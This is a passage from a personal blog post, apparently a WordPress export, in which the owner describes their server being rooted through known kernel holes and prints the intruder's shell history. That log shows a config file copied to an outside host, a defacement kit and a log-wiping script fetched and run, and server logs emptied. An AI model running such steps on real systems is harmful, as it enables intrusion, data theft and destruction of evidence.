their web site<\/a>.<\/p>\nNo, they’re not paying me to plug them. \ud83d\ude09 They’re just really good. And their music has hope – something that I’ve been missing. \ud83d\ude09<\/p>\n
Anyway, second of all, Curious warned me and I was a bad Sheer and didn’t listen.. the kernel on sheer.us had two known paths to root from nonpriv’d users.. and I got owned, by
\naarkan@rachacuca.homelinux.com.<\/p>\n
A excerpt of the .bash_history, for those of you who like such things, is below:<\/p>\n
\nwho\nps aux\ncd \/usr\/local\/apache\/conf\nls\nwho\nftp ftp.grupong.v10.com.br\nftp ftp.grupong.v10.com.br\nftp rachacuca.homelinux.com\nftp rachacuca.homelinux.com\nscp httpd.conf aarkan@rachacuca.homelinux.com\nscp httpd.conf aarkan@rachacuca.homelinux.com:\/home\/aarkan\ncd\ncd \/root\ncd .ssh\nls\nrm know_hosts\ncat \/dev\/null > known_hosts\ncd \/tmp\ncd \/home\nls\ncd kenny\nls\ncd ..\nls\ncd netlogin\nls\ncd ..\nlls\nls\ncd\ncd \/\nmkdir mass\ncd mass\nwget www.geocities.com\/xferror\/mass.tgz\nwget rachacuca.homelinux.com\/NG\/index.html\nuname -a\nwget rachacuca.homelinux.com\/NG\/index.html\nrm index.html\nmv index.html.1 index.kmg\ntar zxvf mass.tgz\n.\/mass \/home\nchmod 777 mass\nchmod 777 mass2\nchmod 777 mass3\ncd \/usr\/local\/apache\/logs\nls\ncat \/dev\/null > *\nls -l\ncd \/mass\nwget rachacuca.homelinux.com\/NG\/limpalog.sh\nchmod 777 limpalog.sh\n.\/limpalog.sh \/usr\/local\/apache\/logs\nls -l \/usr\/local\/apache\/logs\n.\/limpalogs.sh \/var\/logs\n.\/limpalog.sh \/var\/log\n.\/limpalog.sh \/var\/log\/httpd\n.\/mass \/home\n.\/mass1 \/home\n.\/mass2 \/home\n.\/mass3 \/home\nrm brk2.zip\nrm bind.zip\nrm -rf \/mass\n<\/pre>\nAnyway, normally I’d be completely cool with this – but he didn’t leave the old index.html’s renamed, so I’m somewhat annoyed at him. <\/p>\n
Look, security can be a game of chess, fun for both sides – or it can be a war, involving cops and thugs and jail time and stuff. If no damage is done, it’s a lot more likely to stay the former – fun for everyone. <\/p>\n
Hackers, ALWAYS back up waht you deface. Luckily, the wayback machine had most of what was lost (I hadn’t done a backup in forever. Bad sheer number 2.. )<\/p>\n
Anyway, so right now I’m slowly progressing through the PITA of upgrading every potentially vulnerable service..<\/p>\n","protected":false},"excerpt":{"rendered":"
Well, a day of good and bad spots. First of all, let me just say, the U.S.E. CD release party _rocked_! I realize very few of my friends list lives in Seattle, and of those who do, most wouldn’t ever do anything as peblean as listening to U.S.E., but I don’t care. It rocked. If […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/posts\/1298"}],"collection":[{"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/comments?post=1298"}],"version-history":[{"count":0,"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/posts\/1298\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/media?parent=1298"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/categories?post=1298"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sheer.us\/weblogs\/wp-json\/wp\/v2\/tags?post=1298"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}